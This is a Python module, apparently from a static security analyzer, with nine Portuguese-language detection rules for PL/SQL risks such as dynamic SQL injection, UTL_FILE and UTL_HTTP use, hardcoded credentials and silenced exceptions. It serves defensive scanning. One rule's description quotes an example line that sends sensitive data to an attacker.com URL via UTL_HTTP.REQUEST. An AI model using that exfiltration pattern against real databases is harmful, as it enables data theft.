"""Regras de segurança para PL/SQL (Oracle) — 9 regras (PLSQLP-001..009)."""
import re
from analyzer.models import Severity, Confidence, Language, VulnCategory
from analyzer.rules.base import Rule

PLSQL_RULES: list[Rule] = [
    Rule(
        id="PLSQLP-001",
        name="EXECUTE IMMEDIATE com Concatenação — SQL Injection",
        description="'EXECUTE IMMEDIATE \"SELECT\" || variavel' em PL/SQL executa SQL dinâmico construído por concatenação de strings. Com variáveis derivadas de input externo, permite injeção de SQL arbitrário com as permissões do contexto de execução da procedure, podendo incluir AUTHID CURRENT_USER.",
        severity=Severity.CRITICAL,
        category=VulnCategory.SQL_INJECTION,
        language=Language.PLSQL,
        pattern=r"EXECUTE\s+IMMEDIATE\s+['\"][^'\"]*'\s*\|\|",
        remediation="Use EXECUTE IMMEDIATE com USING para parâmetros: EXECUTE IMMEDIATE 'SELECT * FROM ' || DBMS_ASSERT.QUALIFIED_SQL_NAME(v_table) || ' WHERE id = :1' USING v_id; Use DBMS_ASSERT para validar nomes de objetos dinâmicos. Para queries completamente dinâmicas, use DBMS_SQL com bind variables.",
        cwe="CWE-89",
        owasp="A03:2021",
        confidence=Confidence.HIGH,
        flags=re.IGNORECASE,
    ),
    Rule(
        id="PLSQLP-002",
        name="UTL_FILE — Leitura/Escrita de Arquivos do Sistema",
        description="UTL_FILE em PL/SQL permite ler e escrever arquivos no filesystem do servidor Oracle. Sem controle de acesso adequado, procedures com UTL_FILE podem ser exploradas para ler arquivos de configuração do Oracle, escrever scripts maliciosos ou exfiltrar dados para diretórios acessíveis externamente.",
        severity=Severity.HIGH,
        category=VulnCategory.SECURITY_MISCONFIG,
        language=Language.PLSQL,
        pattern=r'\bUTL_FILE\s*\.\s*(?:FOPEN|GET_LINE|PUT|PUT_LINE|NEW_LINE|FCLOSE)',
        remediation="Restrinja UTL_FILE a Oracle Directory Objects com caminhos fixos e pre-aprovados: GRANT READ ON DIRECTORY safe_export_dir TO limited_user. Audite uso: SELECT * FROM DBA_AUDIT_OBJECT WHERE OBJECT_NAME='UTL_FILE'. Prefira External Tables para importação de dados com controle de acesso por objeto.",
        cwe="CWE-73",
        owasp="A01:2021",
        confidence=Confidence.MEDIUM,
    ),
    Rule(
        id="PLSQLP-003",
        name="UTL_HTTP — Requisições HTTP Externas de PL/SQL",
        description="UTL_HTTP permite que código PL/SQL faça requisições HTTP para URLs externas. Pode ser usado para exfiltrar dados (SELECT ... INTO UTL_HTTP.REQUEST('http://attacker.com/data?d='||sensitive_data)), fazer SSRF para serviços internos não expostos, ou como canal de C2.",
        severity=Severity.HIGH,
        category=VulnCategory.SECURITY_MISCONFIG,
        language=Language.PLSQL,
        pattern=r'\bUTL_HTTP\s*\.\s*(?:REQUEST|BEGIN_REQUEST|GET_RESPONSE|READ_TEXT)',
        remediation="Controle acesso a UTL_HTTP via Oracle Network ACLs: DBMS_NETWORK_ACL_ADMIN.CREATE_ACL('allow_api.xml', 'Allow API', 'app_user', TRUE, 'connect', null, 'host'). Configure ACLs para permitir apenas URLs específicas. Prefira chamar APIs externas da camada de aplicação, não do banco de dados.",
        cwe="CWE-918",
        owasp="A10:2021",
        confidence=Confidence.MEDIUM,
        flags=re.IGNORECASE,
    ),
    Rule(
        id="PLSQLP-004",
        name="AUTHID CURRENT_USER sem Validação de Privilege",
        description="Procedures com 'AUTHID CURRENT_USER' executam com os privilégios do usuário chamador, não do owner. Sem verificação de privilégios no corpo da procedure, um usuário com EXECUTE pode usar a procedure para operações que normalmente não teria acesso direto, dependendo do contexto de chamada.",
        severity=Severity.MEDIUM,
        category=VulnCategory.BROKEN_ACCESS,
        language=Language.PLSQL,
        pattern=r'AUTHID\s+CURRENT_USER',
        remediation="Adicione verificação de privilege: IF NOT DBMS_SESSION.IS_ROLE_ENABLED('APP_ADMIN_ROLE') THEN RAISE_APPLICATION_ERROR(-20001, 'Access denied'); END IF. Para procedures que precisam de AUTHID CURRENT_USER (ex: para RLS baseada em usuário), documente explicitamente e audite regularmente.",
        cwe="CWE-284",
        owasp="A01:2021",
        confidence=Confidence.LOW,
        flags=re.IGNORECASE,
    ),
    Rule(
        id="PLSQLP-005",
        name="Credencial Hardcoded em PL/SQL",
        description="Senhas, tokens ou connection strings com credenciais literais em código PL/SQL ficam visíveis em DBA_SOURCE e USER_SOURCE (dicionário de dados Oracle), acessíveis a qualquer DBA. Além disso, scripts DDL com credenciais são frequentemente armazenados em repositórios git.",
        severity=Severity.CRITICAL,
        category=VulnCategory.HARDCODED_SECRETS,
        language=Language.PLSQL,
        pattern=r"(?:v_|l_)?(?:password|passwd|secret|token|api_key)\s*:=\s*'[^']{6,}'",
        remediation="Use Oracle Wallet ou DBMS_CREDENTIAL para armazenar credenciais: SELECT credential_name INTO v_cred FROM all_credentials WHERE credential_name='APP_API_KEY'. Acesse com: UTL_HTTP.SET_AUTHENTICATION(utl_http.begin_request(url), DBMS_CREDENTIAL.GET_CREDENTIAL('API_KEY')). Nunca hardcode em PL/SQL.",
        cwe="CWE-798",
        owasp="A02:2021",
        confidence=Confidence.MEDIUM,
        flags=re.IGNORECASE,
    ),
    Rule(
        id="PLSQLP-006",
        name="DBMS_SCHEDULER com String Dinâmica",
        description="'DBMS_SCHEDULER.CREATE_JOB' com 'job_action' construído por concatenação pode executar código PL/SQL ou programas externos com credenciais do Oracle scheduler. Um job_action controlável por usuário é execução arbitrária de código no contexto do Oracle.",
        severity=Severity.HIGH,
        category=VulnCategory.CODE_INJECTION,
        language=Language.PLSQL,
        pattern=r'DBMS_SCHEDULER\s*\.\s*CREATE_JOB[^;]+job_action\s*=>\s*[^,)]+\|\|',
        remediation="Nunca construa job_action por concatenação. Use templates fixos: DBMS_SCHEDULER.CREATE_JOB(job_name=>'FIXED_JOB', job_type=>'STORED_PROCEDURE', job_action=>'pkg.safe_procedure', enabled=>TRUE). Para parâmetros variáveis, use DBMS_SCHEDULER.SET_JOB_ARGUMENT_VALUE após criar o job.",
        cwe="CWE-94",
        owasp="A03:2021",
        confidence=Confidence.MEDIUM,
        flags=re.IGNORECASE,
    ),
    Rule(
        id="PLSQLP-007",
        name="Acesso a DBA_ Views em Código de Aplicação",
        description="Queries em DBA_USERS, DBA_TABLES, DBA_OBJECTS, DBA_SOURCE ou outras views DBA_ em código PL/SQL de aplicação requerem SELECT_CATALOG_ROLE ou SELECT ANY DICTIONARY — privilégios excessivos para código de aplicação. Expose metadados internos do Oracle de forma indevida.",
        severity=Severity.MEDIUM,
        category=VulnCategory.BROKEN_ACCESS,
        language=Language.PLSQL,
        pattern=r'FROM\s+DBA_(?:USERS|TABLES|OBJECTS|SOURCE|COLUMNS|INDEXES|TRIGGERS|PROCEDURES)',
        remediation="Use USER_ views (contexto do schema atual) ou ALL_ views (objetos acessíveis): FROM USER_TABLES em vez de DBA_TABLES. Para auditoria, use dbms_metadata.get_ddl() com permissões mínimas. Se DBA_ views são necessárias, crie uma procedure em schema dedicado com AUTHID DEFINER.",
        cwe="CWE-284",
        owasp="A01:2021",
        confidence=Confidence.LOW,
        flags=re.IGNORECASE,
    ),
    Rule(
        id="PLSQLP-008",
        name="EXCEPTION WHEN OTHERS THEN NULL — Silencia Todos Erros",
        description="'EXCEPTION WHEN OTHERS THEN NULL' em PL/SQL descarta silenciosamente qualquer exceção, incluindo erros de segurança, violações de constraint, deadlocks e erros de autenticação. Procedures de login ou autorização com esse padrão podem mascarar bypass de controles de segurança.",
        severity=Severity.HIGH,
        category=VulnCategory.ERROR_HANDLING,
        language=Language.PLSQL,
        pattern=r'EXCEPTION\s+WHEN\s+OTHERS\s+THEN\s+(?:NULL\s*;|RETURN\s*;)',
        remediation="Sempre logue e trate o erro: EXCEPTION WHEN OTHERS THEN INSERT INTO app_error_log(msg, stack) VALUES(SQLERRM, DBMS_UTILITY.FORMAT_ERROR_BACKTRACE); RAISE; Para erros esperados, capture exceções específicas: EXCEPTION WHEN NO_DATA_FOUND THEN ... WHEN DUP_VAL_ON_INDEX THEN ...",
        cwe="CWE-390",
        owasp="A05:2021",
        confidence=Confidence.HIGH,
        flags=re.IGNORECASE,
    ),
    Rule(
        id="PLSQLP-009",
        name="GRANT sem WITH GRANT OPTION Explícito",
        description="'GRANT priv ON objeto TO usuario' sem 'WITH GRANT OPTION' ainda concede o privilege. Procedures que executam GRANT de forma dinâmica podem criar cadeias de permissão não rastreáveis. Procedures com EXECUTE AS owner que fazem GRANT ampliam silenciosamente permissões de usuários.",
        severity=Severity.MEDIUM,
        category=VulnCategory.BROKEN_ACCESS,
        language=Language.PLSQL,
        pattern=r'EXECUTE\s+IMMEDIATE\s+["\']?\s*GRANT\s+',
        remediation="Nunca execute GRANT via EXECUTE IMMEDIATE — isso cria grants dinâmicos difíceis de auditar. Gerencie grants via scripts DDL versionados e revisados em code review. Se grants dinâmicos são necessários, crie uma procedure centralizada de gerenciamento de permissões com logging completo.",
        cwe="CWE-269",
        owasp="A01:2021",
        confidence=Confidence.HIGH,
        flags=re.IGNORECASE,
    ),
]
